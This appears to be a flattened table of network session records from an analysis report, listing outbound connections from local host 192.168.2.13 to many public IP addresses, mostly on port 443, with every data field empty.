                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10144192.168.2.1333756200.36.68.131443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10145192.168.2.13549869.84.229.203443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10146192.168.2.134017463.51.30.16443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10147192.168.2.1356804198.102.141.49443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10148192.168.2.1354654200.134.18.190443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10149192.168.2.1334512192.179.4.82443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10150192.168.2.1350496185.240.228.54443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10151192.168.2.134400845.100.231.14443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10152192.168.2.1357082101.20.54.67443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10153192.168.2.1335004113.92.98.94443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10154192.168.2.1340542130.160.10.185443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10155192.168.2.1359692129.64.183.156443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10156192.168.2.1337524174.124.55.179443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10157192.168.2.1338248220.22.12.8443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10158192.168.2.135235037.246.88.200443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10159192.168.2.1347134145.231.2.101443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10160192.168.2.1355106208.217.191.159443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10161192.168.2.136021472.149.35.65443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10162192.168.2.1355684223.192.184.216443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10163192.168.2.1334486189.29.165.56443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10164192.168.2.1332948124.120.239.199443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10165192.168.2.1355940133.172.11.180443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10166192.168.2.1337806126.196.220.189443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10167192.168.2.1354936112.167.14.50443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10168192.168.2.1348422164.192.70.72443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10169192.168.2.1352910116.165.228.106443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10170192.168.2.1352218144.56.144.104443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10171192.168.2.1350290216.189.139.106443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10172192.168.2.134555025.150.193.179443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10173192.168.2.1345484174.49.246.65443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10174192.168.2.13347449.166.225.139443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10175192.168.2.1350900131.53.220.213443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10176192.168.2.133590869.96.146.157443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10177192.168.2.1334702133.225.19.187443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10178192.168.2.1351470169.210.34.2443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10179192.168.2.133725249.237.48.67443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10180192.168.2.1357576206.56.142.234443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10181192.168.2.1333452166.247.203.23443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10182192.168.2.1353868202.35.66.1443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10183192.168.2.134197643.97.97.47443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10184192.168.2.13456205.209.108.81443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10185192.168.2.134837657.205.168.92443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10186192.168.2.1360614217.111.136.251443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10187192.168.2.1344980177.122.169.45443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10188192.168.2.1341628206.13.103.70443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10189192.168.2.1355514145.228.181.144443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10190192.168.2.133718077.149.186.67443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10191192.168.2.1358410150.93.60.63443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10192192.168.2.1354320187.253.233.199443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10193192.168.2.1344476150.195.203.59443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10194192.168.2.1343858173.237.160.176443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10195192.168.2.1351778182.88.198.1443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10196192.168.2.134864869.108.33.184443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10197192.168.2.1343842109.250.81.16443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10198192.168.2.133541819.105.59.172443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10199192.168.2.134438896.118.134.76443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10200192.168.2.1357092104.107.94.138443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10201192.168.2.1339144146.233.245.105443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10202192.168.2.1349616110.145.159.115443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10203192.168.2.1341912125.182.42.54443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10204192.168.2.1337870133.235.174.22443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10205192.168.2.133902486.95.47.131443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10206192.168.2.133374297.225.6.243443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10207192.168.2.134684020.135.153.152443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10208192.168.2.1351868105.129.252.112443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10209192.168.2.1345002168.98.148.37443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10210192.168.2.133503888.126.27.181443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10211192.168.2.1334412212.188.102.30443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10212192.168.2.134055685.180.227.175443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10213192.168.2.1359948168.135.84.31443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10214192.168.2.1339222150.118.164.98443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10215192.168.2.1347808220.31.199.243443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10216192.168.2.1353370204.84.24.215443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10217192.168.2.133377618.232.170.248443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10218192.168.2.135479627.67.180.249443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10219192.168.2.1344906198.232.173.55443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10220192.168.2.135934250.240.87.54443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10221192.168.2.135057066.89.173.234443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10222192.168.2.134064073.225.131.22443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10223192.168.2.1353730122.183.224.220443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10224192.168.2.1359722193.201.58.143443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10225192.168.2.1356252174.97.160.55443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10226192.168.2.133751694.78.165.123443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10227192.168.2.1356302216.250.163.21443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10228192.168.2.134624482.194.164.77443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10229192.168.2.1354246179.123.192.10443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10230192.168.2.1339912133.157.137.237443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10231192.168.2.1351440189.167.163.178443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10232192.168.2.1352346163.230.134.3443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10233192.168.2.1337044157.252.29.5443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10234192.168.2.1342966181.181.89.19443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10235192.168.2.1341638163.93.14.230443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10236192.168.2.1348882115.64.144.8443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10237192.168.2.134568470.63.21.206443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10238192.168.2.136024884.171.13.90443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10239192.168.2.1348742109.187.127.227443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10240192.168.2.1340668165.90.203.47443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10241192.168.2.134372861.130.235.147443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10242192.168.2.1335024140.206.13.163443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10243192.168.2.1335554142.196.248.12443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10244192.168.2.1343018220.132.42.121443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10245192.168.2.133308625.94.210.110443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10246192.168.2.1346776147.37.7.195443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10247192.168.2.13606724.98.101.100443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10248192.168.2.133502424.206.252.38443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10249192.168.2.134120075.156.205.133443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10250192.168.2.134449849.80.144.38443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10251192.168.2.1334816156.26.180.84443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10252192.168.2.134361264.47.115.212443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10253192.168.2.1335516187.180.165.227443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10254192.168.2.1334162109.160.170.71443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10255192.168.2.13392405.98.218.61443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10256192.168.2.135446298.223.33.69443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10257192.168.2.1344956188.36.168.184443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10258192.168.2.1344986126.187.176.143443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10259192.168.2.134154892.151.189.146443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10260192.168.2.1354810195.244.217.218443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10261192.168.2.1337458203.162.117.226443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10262192.168.2.1354584202.21.246.128443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10263192.168.2.136055868.61.109.181443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10264192.168.2.1340912106.79.153.135443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10265192.168.2.1353874151.85.175.113443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10266192.168.2.1336978200.58.127.18443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10267192.168.2.1354920199.209.243.245443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10268192.168.2.135382440.115.59.158443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10269192.168.2.135465099.137.158.223443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10270192.168.2.1347648142.120.41.114443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10271192.168.2.1349534112.105.56.143443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10272192.168.2.135805092.146.52.99443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10273192.168.2.13386002.65.147.220443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10274192.168.2.1353646171.218.2.216443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10275192.168.2.1352588138.24.119.107443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10276192.168.2.1335948186.169.69.108443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10277192.168.2.1357428106.81.56.129443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10278192.168.2.1359452191.227.251.147443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10279192.168.2.135842624.142.38.248443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10280192.168.2.1334396169.76.177.149443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10281192.168.2.1338692212.129.37.195443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10282192.168.2.1348274160.40.132.247443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10283192.168.2.1349120120.44.79.180443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10284192.168.2.133284076.119.193.135443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10285192.168.2.1339728217.92.76.24443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10286192.168.2.133950878.241.198.148443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10287192.168.2.1333902186.87.216.6443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10288192.168.2.133870637.196.179.212443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10289192.168.2.134281282.47.172.102443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10290192.168.2.1357378131.80.243.219443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10291192.168.2.135790886.54.22.138443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10292192.168.2.1341812137.98.253.3443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10293192.168.2.1336576125.164.77.206443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10294192.168.2.133294662.111.56.131443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10295192.168.2.1351318131.125.254.180443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10296192.168.2.134458675.198.179.208443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10297192.168.2.134745625.233.248.254443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10298192.168.2.1333970200.131.29.99443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10299192.168.2.1359364131.66.39.231443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10300192.168.2.1347028159.198.229.181443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10301192.168.2.1335840160.220.29.44443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10302192.168.2.133393474.106.152.143443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10303192.168.2.1350442169.71.190.169443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10304192.168.2.1344986197.206.13.110443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10305192.168.2.134064237.27.47.79443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10306192.168.2.1341708109.228.30.215443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10307192.168.2.1346014108.1.77.70443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10308192.168.2.1339020174.97.130.183443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10309192.168.2.1339782202.188.154.0443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10310192.168.2.1335640139.114.30.44443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10311192.168.2.1343480185.100.60.123443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10312192.168.2.1354216154.194.141.120443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10313192.168.2.1343820131.249.214.87443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10314192.168.2.1342084181.229.219.53443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10315192.168.2.1339966154.141.189.201443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10316192.168.2.1342426146.94.218.185443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10317192.168.2.1335678145.39.222.21443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10318192.168.2.1350322210.249.155.102443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10319192.168.2.1345398212.48.63.49443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10320192.168.2.134167025.129.53.156443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10321192.168.2.1339690152.232.4.235443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10322192.168.2.135606853.198.111.93443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10323192.168.2.1334908206.91.146.55443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10324192.168.2.1340106190.43.120.191443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10325192.168.2.1356648128.206.110.62443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10326192.168.2.1352096205.86.45.216443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10327192.168.2.1337672202.32.77.209443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10328192.168.2.1353024113.209.145.114443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10329192.168.2.134512831.148.82.211443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10330192.168.2.1341972165.33.233.46443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10331192.168.2.134830452.74.163.58443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10332192.168.2.1341418191.96.127.222443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10333192.168.2.135084668.108.92.190443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10334192.168.2.136064638.41.58.248443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10335192.168.2.1350996212.225.222.29443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10336192.168.2.1352508129.181.166.155443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10337192.168.2.135509819.214.247.231443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10338192.168.2.1334386165.59.1.87443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10339192.168.2.1360068171.1.220.50443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10340192.168.2.1350564183.115.123.39443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10341192.168.2.1345870192.167.255.136443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10342192.168.2.1348944212.127.116.253443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10343192.168.2.134187869.43.168.144443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10344192.168.2.135092690.49.12.245443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10345192.168.2.1338916109.23.251.191443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10346192.168.2.1335032114.21.79.30443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10347192.168.2.13488109.104.110.137443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10348192.168.2.135564298.107.0.14443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10349192.168.2.1343652133.159.127.53443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10350192.168.2.1359344202.126.120.145443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10351192.168.2.135547278.71.88.115443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10352192.168.2.1350374119.246.93.246443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10353192.168.2.1339344130.18.12.41443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10354192.168.2.1348512222.149.53.163443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10355192.168.2.1339268105.14.85.240443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10356192.168.2.1342460196.143.107.94443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10357192.168.2.1336106105.15.185.110443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10358192.168.2.135600893.217.51.1838080
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10359192.168.2.134767245.223.182.718080
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10360192.168.2.133763045.8.255.2388080
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10361192.168.2.1341932209.151.176.220443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10362192.168.2.135077836.150.108.4443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10363192.168.2.134946824.24.214.162443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10364192.168.2.1346244130.162.251.9443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10365192.168.2.1334610208.121.104.119443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10366192.168.2.133763645.8.255.2388080
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10367192.168.2.1351876152.127.174.62443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10368192.168.2.134402683.190.218.29443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10369192.168.2.1333248165.104.37.43443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10370192.168.2.135361495.180.23.45443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10371192.168.2.135680070.91.189.227443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10372192.168.2.1347986162.227.37.11443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10373192.168.2.134070273.168.100.47443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10374192.168.2.1350700212.127.69.186443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
